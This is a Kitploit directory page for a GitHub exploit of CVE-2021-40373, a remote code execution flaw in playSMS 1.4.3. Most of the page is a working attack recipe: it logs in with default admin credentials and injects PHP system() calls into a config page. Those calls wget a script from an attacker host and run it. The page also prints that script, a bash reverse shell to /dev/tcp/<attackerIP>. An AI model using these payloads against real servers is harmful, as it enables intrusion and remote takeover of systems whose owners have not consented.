Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-40373 — CVE-2021-40373 - remote code execution | Kitploit
Tools/GitHubGitHub/maikroservice/cve-2021-40373
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubmaikroservice/cve-2021-40373

CVE-2021-40373

CVE-2021-40373 - remote code execution

View Repository
114 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-playsms

There is a vulnerability in playsms 1.4.3 that allows potential attackers to execute remote code execution.

how to reproduce RCE (shell):

https://playsms.org/

  • docker pull playsms/playsms:1.4.3
  • docker run -d -p 80:80 playsms/playsms
  • login using admin:admin
  • http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • host malicious bash file on attacker machine
  • download the malicious file using wget on the machine
  • enter <?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?>
  • save the information (it will disappear from the input box but still work)
  • http://127.0.0.1/index.php?app=main&inc=core_welcome
  • reload the page http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • chmod + execute the shell script - <?php system("chmod +x rev.sh && ./rev.sh") ?>)
  • save and visit * http://127.0.0.1/index.php?app=main&inc=core_welcome to get code execution
  • run local netcat handler to catch remote shell

rev.sh

Download Tool
root@kitploit:~
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"